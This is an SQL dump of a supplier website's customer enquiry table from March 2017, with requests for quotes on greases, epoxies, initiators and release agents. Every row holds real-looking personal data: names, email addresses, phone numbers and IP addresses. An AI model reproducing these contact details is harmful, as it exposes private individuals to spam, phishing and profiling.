INSERT INTO `wp_enquiry_detail_new` VALUES (619, 'Blaine Collins', 'bcolli21@lanl.gov', 'Quote for GPL 206 5kg pail', '505695-6162', '', '192.12.184.7', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"790";s:5:"title";s:7:"GPL 206";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_448241593.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-07 14:58:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (620, 'Ingrid Hintersteiner', 'ingrid.hintersteiner@tiger-coatings.com', 'Dear ladies and gentlemen,\n\nI am interested in the VAZO Initiators you offer. However, I have two main questions: \n1. Can the VAZO iniators only be used for polymerisation or also for curing polymers?\n2. I read that there are toxic side products or decomposition products of VAZO 64. Is this also the case for VAZO 67 and VAZO 88?\n\nThanks, best regards\nIngrid Hintersteiner', '', 'VAZO Initiators', '85.31.5.205', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"575";s:5:"title";s:7:"VAZO 67";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VAZO-67-composites.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-07 15:35:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (621, 'Raul Christiansen', 'rchristiansen@barber-nichols.com', 'Looking to get a 2 oz tube quickly for a grease life test we need to start soon.  Can this be delivered in the next 2-4 days?  Thanks!', '303421-8111', 'Quote / Lead Time', '64.207.26.154', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1011";s:5:"title";s:6:"XP 2A3";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-bearing-grease4.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-07 18:54:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (622, 'brian Turner', 'brian.turner@sabic.com', 'We are having issues with our Mag Drive, Hot oil pumps. The oil reservoir, front bearing is exposed to a constant temperature of around 300 F. This oil reservoir is small, no oil cooler, Oil is degrading over time. Operation does not like to switch pumps , do to plant upsets. Need an oil that will take the heat.', '812831-7719', 'XHT - 500 oil', '208.89.225.33', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"707";s:5:"title";s:7:"XHT-500";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_326782289.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-07 21:09:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (623, 'Yaninee', 'cs1@vlk.th.com', 'Dear Sales team,\nI\'m Yaninee from V.L.K. Techno (Thailand)\nV.L.K. is procurement officer that supply chemical for electronic industrial. \n     Today we just get new inquiry from customer. So we would like to request Quotation from you as following.\nPlease kindly proceed to us as soon as possible. \nItem : PTFE Release Agent Dry Lubricant (MS-122AD) \nOther hand, Please provide your MSDS, Lead time, HS Code, Dimension, Gross weight and spec sheet as well', '', 'RFQ : PTFE Release Agent Dry Lubricant (MS-122AD)', '134.196.237.30', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-08 07:26:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (624, 'chaipat', 'chaipat@vlk.th.com', 'Today we just get new inquiry from customer.\nSo we would like to request Quotation from you as following.\nPlease kindly proceed to us as soon as possible.\n\nItem : PTFE Release Agent Dry Lubricant (MS-122AD)\n\nQ\'ty : MOQ', '+6621925956', 'RFQ: ptfe release agent dry lubricant ms-122ad', '134.196.237.30', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-08 08:19:53', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (625, 'MITCHELL TENNANT', 'mitchell@gccomponents.co.uk', 'Please can you advise if you are able to quote me the pricing and delivery time for the following item to myself in the UK:\n\n      Item:   35RN75 (MS-907)\n        Qty:   1 PACK\n', '+441443816661', 'RFQ', '176.35.21.252', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-08 14:14:40', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (626, 'Michelle Brown', 'mbrown@dawnvme.com', 'I hope to get cost and availability very soon!!', '510657-4444', 'MS-381HC', '209.49.242.98', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1670";s:5:"title";s:7:"MS-381H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-08 19:17:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (627, 'Deanna Whitted', 'whittedd@mscdirect.com', 'Please quote the following item and provide the required additional information:\nDGH614101 Dupont Teflon High Temp Grease 14oz cartridge\nAlso need weight, country of origin and UPC code for item.\nPlease quote in minimum purchase quantity packages.  Thank you.', '', 'Quote Request for MSC - Account# 2231890', '69.74.43.38', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1102";s:5:"title";s:23:"Teflon High Temp Grease";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_215450284.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-08 20:55:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (628, 'Michelle Brown', 'mbrown@dawnvme.com', 'I look forward to hearing from you very soon.', '510657-4444', 'MS-381HC', '209.49.242.98', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1670";s:5:"title";s:7:"MS-381H";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-08 21:04:55', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (629, 'Michelle Brown', 'mbrown@dawnvme.com', 'I look forward to hearing from you very soon.', '510657-4444', 'MS-381HC', '209.49.242.98', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1670";s:5:"title";s:7:"MS-381H";s:5:"price";s:0:"";s:5:"quant";s:1:"4";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-08 21:05:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (630, 'Mai Nguyen', 'KNguyenova14@gmail.com', 'Dear Miller-Stephenson company,\n\nI am part of a research lab that works on electrochemistry. I am interested in obtaining EPON resin in order to seal a carbon fiber. Since this is for a research purpose, I will only need the smallest amount of resin. I was hoping to get a quote on that. I would also like to have a recommendation for the curing agent. The literature suggest 14% m-phenylenediamine, but I was wondering if there are any other alternatives.\nThank you for your time,\nMai Nguyen', '619346-9971', 'EPON Resin 828 Inquiry', '130.191.253.209', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-08 21:06:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (631, 'Jeff Heaton', 'jeff@nuytco.com', 'Sirs, Considering this product for use as a pressure transfer media in an oxygen regulator gauge. Estimated requirement is about 30 ml.\nCan you send me some pricing and tube size options? Shipping to North Vancouver, British Columbia Canada', '604980-6262', 'Suitabiity and Pricing', '174.7.85.8', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"436";s:5:"title";s:7:"GPL 101";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-08 23:47:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (632, 'mahesh hegde', 'maheshhegdebogrimakki@gmail.com', 'Can you please send me information regarding availability and price. \n\nThank you. ', '', '', '14.139.155.135', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"861";s:5:"title";s:11:"EPON™ 826";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-RESIN-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-09 04:39:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (633, 'Steve Ripley', 'ripley@thetractors.com', 'Admittedly, the MS-738 lasts a long time in our recording studio. This would be my 3rd order in 15(?) years. But there\'s nothing like it and we\'re about out. If we\'re in your system, it would likely be as RGM, Inc.; Church Studio; or Tulsa Music Group. The times before, I\'ve purchased 4 cans. Let me know the price. Thanks...', '918630-8612', 'MS-738', '206.246.23.122', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1840";s:5:"title";s:6:"MS-738";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-2-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-09 18:16:16', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (634, 'Patrick Sullivan', 'psullivan@vaportech.com', 'Do you supply a form of the KS 1220 that can be applied by PVD coating?  If so, please provide a quote.  Also, can you recommend a service provider that applies KS 1220 using PVD?', '303652-8500', 'Krytox KS 1220 functional polymer', '63.111.19.5', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2460";s:5:"title";s:7:"KS 1220";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_84131626.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-09 23:10:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (635, 'Bradford Barcus', 'bradbarcus@yahoo.com', 'I am looking for a water proofing spray to use on my quadcopters. I would like to find the best product for the job and ask the price. ', '', 'Waterproofing circuit boards in quadcopters', '47.198.240.130', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:7:"MS-460H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-10 00:43:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (636, 'Michael Riederer', 'michael@tidalvisionusa.com', 'Hi, \n\nI am looking for a release agent to coat aluminum for curing a water-based polymer for a period of 24 hours at 200-250 degrees Fahrenheit. Would ReleaseSys 8200 be appropriate for this?  I have used the MS 122-AD spray but am looking for something thicker and more durable for this application.\n\n\nThank you,\n\nMichael Riederer', '206371-0503', 'ReleaSys 8200', '97.126.33.155', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"297";s:5:"title";s:13:"ReleaSys 8200";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:85:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Windmill-ReleaSys-82.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-10 02:29:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (637, 'Adam Donley', 'adam.donley@sublino.com', 'Dear M-S Team,\n\nWe have been developing some products which have been using Vazo 67 to polymerise. We are now at a stage of sending out samples and I would like to purchase 1kg for initial samples and get quotes and lead times on a 25kg pack for future supply.\n\nLooking forward to hearing from you.\n\nMany thanks,\nAdam', '+441925864559', 'Vazo 67 Supply', '194.73.73.10', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"575";s:5:"title";s:7:"VAZO 67";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VAZO-67-composites.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-10 11:22:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (638, 'Richard Devine', 'richard.devine@unnpp.gov', 'I would like to order 1 case of this product. The customer PO# is C456L-17-094. My commercial credit card can be charged. Please do not add state sales tax, a direct payment permit can be furnished upon request. Please email an invoice for this transaction including shipping charges. Please ship via UPS ground if possible. Any questions please call or email- thanks.', '518395-7663', 'Purchase 1 Case of Aero Duster MS-222N', '149.37.1.250', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-10 13:12:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (639, 'Kymberly MacArthur', 'macarthur@achatespower.com', 'Need Pricing and Lead Time for 2 units of MS-550 Flux Cleaner.', '858535-9920', 'RFQ', '174.78.188.66', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"3358";s:5:"title";s:17:"MS-550N / MS-552N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/12/shutterstock_543794323.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-10 15:40:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (640, 'Nick', 'nickt@advanced-inc.com', 'HI there. I would like to know where to purchase a case of this cleaner in Canada. we are located in Mississauga, ON. we deal in AV equipment and would find this product very useful. ', '', 'Purchasing MS-260', '66.11.64.129', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:2:"20";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-10 16:19:50', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (641, 'Chris Maas', 'maasfarm@rockisland.com', 'Can you send me a sample of MS-145W for testing? Or direct me to a source for a small quantity purchase? I am looking for a mold release suitable for releasing carbon/epoxy laminates from aluminum molds using 350F cure temperatures. Thank you.\nChris Maas\nP.S. your form above requires a higher quantity than I need.\n', '360375-6135', 'MS - 145W ', '207.32.171.38', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2312";s:5:"title";s:21:"MS-145W (Water-based)";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_72669607.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-10 18:01:18', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (642, 'Cynthia Witt', 'cynthia.witt@airgas.com', 'Could I please get a quote for 2 tubes/syringes of the Krytox GPL 205 Grease?\n\nThank you,', '918609-6927', 'Krytox Grease', '65.209.181.185', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-10 18:57:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (643, 'MARGIE', 'MM1@VICTORYSUPPLYCO.COM', 'Hello, I need price and avail on 100 cans of MS-222L. An MSDS is required. THANKS!', '321277-8572', 'PRICE AND AVAIL', '72.188.254.209', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2782";s:5:"title";s:27:"MS-222L Aero-Duster® Ultra";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_130437422.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-13 03:10:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (644, 'Mladen Donchev', 'mladen.donchev@ventions.com', 'Hello,\nI would like to purchase a small qty of the Epon 828. I work for Ventions LLC and we are building a small Launch vehicle. My position is Avionics Hardware Engineer Lead.\nPlease feel free to contact me if there are more questions', '781475-4404', 'Epon 828 quote/purchase', '73.202.185.26', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-13 03:49:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (645, 'Susan Ferguson', 'Susan.Ferguson@rutlandgroup.com', 'Price quote for MS-122AD case.  Also, do I order online or by phone?  Thanks!', '704553-0046', 'order', '4.15.182.26', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-13 13:06:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (646, 'Nancy', 'nancy.phoenix@gemssensors.com', 'Please quote me price per can - Will be ordering\n12 Cans', '860793-4332', '', '50.233.42.114', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:2:"12";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-13 15:01:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (647, 'Chuck Spurrier', 'charless@ramcompany.com', 'I would like to get a quote for 1 gallon of the Vertrel MCA.', '435673-4603', '', '209.33.201.27', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1834";s:5:"title";s:7:"MS-752U";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-752U.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-13 15:52:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (648, 'Samuel', 'sabdala@llu.edu', 'Price of Epon 815C, Heloxy Modifier 61, and EPI-CURE Curing Agent 3223 (DETA)', '772252-0670', 'Price Inquiry', '151.112.29.60', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-13 16:12:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (649, 'CHRISTOPHER J GAYNOR', 'chris.gaynor@ametek.com', 'Please quote 50 each of the GPL227  1/2 oz tubes.\nSend quote to chris.gaynor@ametek.com.\n\nThank you!', '918459-7160', 'GPL227', '208.87.239.180', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"852";s:5:"title";s:7:"GPL 227";s:5:"price";s:0:"";s:5:"quant";s:2:"50";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_316632911.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-13 17:36:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (650, 'Joseph Mosley', 'joseph@enchroma.com', 'Would you provide pricing for 100 grams of VAZO-64? We are in Berkeley, CA, USA', '', 'Pricing and availability for VAZO-64 initiator', '173.239.75.210', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"427";s:5:"title";s:7:"VAZO 64";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VAZO-64-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-14 00:45:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (651, 'Risto Lazic', 'r.lazic@tracoe.com', 'Ladies and Gentlemen,\n\nWe are a medical product manufacturer in Germany. \n\nYour Product MS-122XD was recommended for use as a mold release in a top transfer silicone mold application. \n\nPlease let us know if you can ship MS-122XD to Germany, or if you have a distributor in Europe. We would appreciate it, if you would provide a quotation and conditions for payment and sale the contact information of your European distributor. \n\nThank you very much.\nSincerely,\nRisto Lazic. ', '0114961369169132', 'Obtaining the MS-1222XD in Europe ', '80.152.11.22', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1681";s:5:"title";s:8:"MS-122XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122xd-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-14 08:05:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (652, 'Yue Zhao', 'yue.zhao.1@stonybrook.edu', 'Hello, this is Yue from Stony Brook University. Can you please send me a quote for a quart Epikure 3274? Thank you very much. ', '631632-9958', '', '129.49.37.105', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1191";s:5:"title";s:15:"EPIKURE™ 3274";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-15 15:02:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (653, 'Benjamin Rupert', 'benjamin@bluecurrent.com', 'Please quote 5kg of GPL-100, including lead time.\n\nThank you,\nBenjamin Rupert', '510932-9129', 'quote for 5kg GPL-100', '208.71.156.50', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"421";s:5:"title";s:7:"GPL 100";s:5:"price";s:0:"";s:5:"quant";s:1:"5";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-15 22:45:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (654, 'adam ellis', 'adam.ellis@safrangroup.com.au', 'Hello,\n\nCan you please let me know if this is available in Australia ?\n\nCheers\nAdam', '', 'Re-sellerLocations', '203.27.186.34', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-16 03:01:16', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (655, 'Mr Vince Low', 'doublesspac@singnet.com.sg', 'Hi, please advise if we are able to buy some quantity of Epoxy 907 and send in by courier ?', '+6597776229', 'Enquiry for Epoxy 907', '128.106.150.251', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-03-16 06:20:01', '', NULL, '', '', '', NULL, '', ''); 
